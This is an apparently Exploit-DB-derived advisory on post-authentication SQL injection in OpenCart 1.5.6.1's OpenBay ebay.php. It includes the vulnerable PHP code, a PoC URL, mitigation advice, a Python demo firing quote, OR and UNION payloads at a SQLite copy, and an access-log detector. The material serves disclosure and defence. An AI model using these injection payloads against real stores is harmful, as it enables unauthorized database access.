Vendor: OpenCart
By: Saadat Ullah
CVSS: 7.5 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: OpenCart
Affected Version From: 1.5.6.1
Affected Version To: 1.5.6.1
Patch Exists: YES
Related CWE: N/A
CPE: a:opencart:opencart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/2.2.15 PHP/5.3.3
Year: 2014

OpenCart <= 1.5.6.1 SQL Injection

OpenCart 1.5.6.1 and earlier ships an OpenBay (eBay) integration whose library, opencart/system/library/ebay.php, builds SQL by concatenating caller-supplied values into quoted string literals without escaping or casting them. getEbayItemId($product_id) interpolates $product_id straight into a WHERE clause; isEbayOrder($id) does the same with an order ID, and getProductStockLevel($productId, $sku = '') with a product ID. These library functions are called from several places with raw request data: in opencart/admin/controller/openbay/openbay.php, editLoad() passes $this->request->get['product_id'] to getEbayItemId(), and in opencart/admin/controller/extension/openbay.php, ajaxOrderInfo() passes $this->request->get['order_id'] to isEbayOrder(). A single quote in the parameter (product_id=1') breaks the query, and a crafted value can change the WHERE logic or append a UNION to read other tables. Because the entry points are admin controllers that require a valid session token and OpenBay module access, the issue is post-authentication: it lets a limited administrator with OpenBay access run SQL of their choosing against the store database, rather than being an unauthenticated remote bug.

Mitigation:

Never interpolate request data into SQL. The affected parameters (product_id, order_id) are numeric identifiers, so the direct fix is to cast them before use, e.g. (int)$this->request->get['product_id'], and to pass any string values through $this->db->escape() before concatenation; OpenCart 1.5.x's database wrapper exposes query() and escape() but no parameter binding, so in that code base the cast plus escape() is the practical form of "use prepared statements". Upgrade to a release in which the OpenBay queries are fixed (the vendor indicates a patch exists), and restrict OpenBay module access to trusted administrators, since that access is what an attacker needs to reach the vulnerable routes.
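As an added example (not OpenCart's code, and not part of the original advisory), the following Python script models the PHP string concatenation from getEbayItemId() against an in-memory SQLite copy of an `ebay_listing` table with a few constructed rows, and places the vulnerable query beside a hardened version that casts the ID to an integer and binds it as a parameter. The table prefix `oc_` and the row contents are assumptions. The UNION payload reads SQLite's catalog table; against MySQL the same technique would target information_schema.

```python
import sqlite3

DB_PREFIX = "oc_"  # OpenCart's DB_PREFIX constant; the value is an assumption


def build_db():
    """Create an in-memory table shaped like OpenBay's ebay_listing with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {DB_PREFIX}ebay_listing (
            product_id INTEGER, ebay_item_id TEXT, status INTEGER);
        INSERT INTO {DB_PREFIX}ebay_listing VALUES (1, '110011122233', 1);
        INSERT INTO {DB_PREFIX}ebay_listing VALUES (2, '110011122234', 0);
        INSERT INTO {DB_PREFIX}ebay_listing VALUES (3, '110011122235', 1);
    """)
    return conn


def get_ebay_item_id_vulnerable(conn, product_id):
    """Mirrors the PHP: "... WHERE `product_id` = '" . $product_id . "' AND `status` = '1' LIMIT 1".
    Whatever the caller passes becomes part of the SQL text."""
    sql = (f"SELECT ebay_item_id FROM {DB_PREFIX}ebay_listing "
           f"WHERE product_id = '{product_id}' AND status = '1' LIMIT 1")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def get_ebay_item_id_fixed(conn, product_id):
    """Hardened form: the ID must be an integer (int() raises ValueError otherwise)
    and is bound as a parameter, so it can never alter the query structure."""
    pid = int(product_id)
    row = conn.execute(
        f"SELECT ebay_item_id FROM {DB_PREFIX}ebay_listing "
        "WHERE product_id = ? AND status = 1 LIMIT 1",
        (pid,),
    ).fetchone()
    return row[0] if row else None


def probe(conn, payload):
    """Run one attacker-controlled value through both versions.
    Returns (vulnerable_result, fixed_result); errors are reported as strings."""
    try:
        vuln = get_ebay_item_id_vulnerable(conn, payload)
    except sqlite3.Error:
        vuln = "SQL ERROR"          # what the PoC's trailing quote produces
    try:
        fixed = get_ebay_item_id_fixed(conn, payload)
    except ValueError:
        fixed = "REJECTED"          # non-numeric input never reaches the database
    return vuln, fixed


PAYLOADS = [
    "1",                                   # legitimate request
    "2",                                   # listed but inactive: no row either way
    "1'",                                  # the advisory's PoC: breaks the query
    "999' OR '1'='1",                      # bypasses the product_id filter
    "999' UNION SELECT name FROM sqlite_master WHERE type='table'-- ",  # reads schema
]

if __name__ == "__main__":
    db = build_db()
    for p in PAYLOADS:
        print(repr(p), "->", probe(db, p))
```

Run it and the vulnerable column shows the three failure modes a tester looks for in order: an SQL error on the bare quote, a row returned for a product ID that does not exist, and a table name leaking through the UNION; the fixed column rejects every non-integer value before any query is built.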

Exploit-DB raw data:

# Exploit Title     : OpenCart <= 1.5.6.1 SQL Injection
# Date              : 2014/3/26
# Exploit Author    : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link     : http://www.opencart.com/index.php?route=download/download
                    : https://github.com/opencart
# Software web      : www.opencart.com
# Author HomePage   : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Opencart suffers from multiple SQL injections in ebay.php; the bug is more about
privilege escalation as an attacker may need openbay module access.

PoC
Poorly coded file full of SQLi: opencart/system/library/ebay.php
In file opencart/system/library/ebay.php,
product_id is used in a SQL query without being sanitized.

public function getEbayItemId($product_id) {
		$this->log('getEbayItemId() - Product ID: '.$product_id);

		$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
The function is called in many locations and the parameter is passed without being sanitized.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
		...
		$item_id        = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] is coming from a GET field.
Similarly, more:

public function isEbayOrder($id) {
		...
		$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");

In opencart\admin\controller\extension\openbay.php
		public function ajaxOrderInfo()
		...
		if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More:
public function getProductStockLevel($productId, $sku = '') {
		...
		$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more.
The user should have openbay module access.
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'

#Independent Pakistani Security Researcher
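The PoC above puts the injected value in a GET parameter, which means it lands verbatim in the web server's access log. As an added example (not from the advisory or from OpenCart), this Python check scans combined-format access log lines for the two admin routes the advisory names and flags any request whose product_id or order_id is not a plain integer. The log lines are constructed for the example; the route name `extension/openbay/ajaxOrderInfo` is an assumption derived from the controller path given above, and the session token is the one shown in the PoC URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin routes named in the advisory and the integer parameter each passes into SQL.
# The extension/openbay route string is an assumption based on the controller path.
WATCHED_ROUTES = {
    "openbay/openbay/editLoad": "product_id",
    "extension/openbay/ajaxOrderInfo": "order_id",
}

# Enough of the Apache/Nginx combined log format for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INTEGER_ID = re.compile(r"^\d+$")

# Constructed sample: one clean admin request, two injection attempts, one storefront hit.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Mar/2014:10:15:01 +0000] "GET /opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=42 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Mar/2014:10:15:09 +0000] "GET /opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Mar/2014:10:15:20 +0000] "GET /opencart/admin/index.php?route=extension/openbay/ajaxOrderInfo&token=5750af85a1d913aded2f6e2128616cb3&order_id=7%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Mar/2014:10:16:00 +0000] "GET /opencart/index.php?route=product/product&product_id=42 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""


def find_injection_attempts(log_text):
    """Return one dict per request to a watched admin route whose ID parameter
    is not purely numeric. parse_qs URL-decodes values, so %27 is compared as a quote."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if "/admin/" not in parts.path:          # only the admin controllers are affected
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        route = qs.get("route", [""])[0]
        param = WATCHED_ROUTES.get(route)
        if param is None:
            continue
        for value in qs.get(param, []):
            if not INTEGER_ID.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "route": route,
                    "param": param,
                    "value": value,
                })
    return hits


if __name__ == "__main__":
    for h in find_injection_attempts(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['route']} {h['param']}={h['value']!r}")
```

The check is deliberately strict: because the vulnerable code only ever needs an integer, anything else in those two parameters is worth a look, regardless of whether it matches a known payload signature. It sees GET parameters only; if the same values are sent in a POST body, the access log will not contain them and the check has to run on a WAF or application log instead.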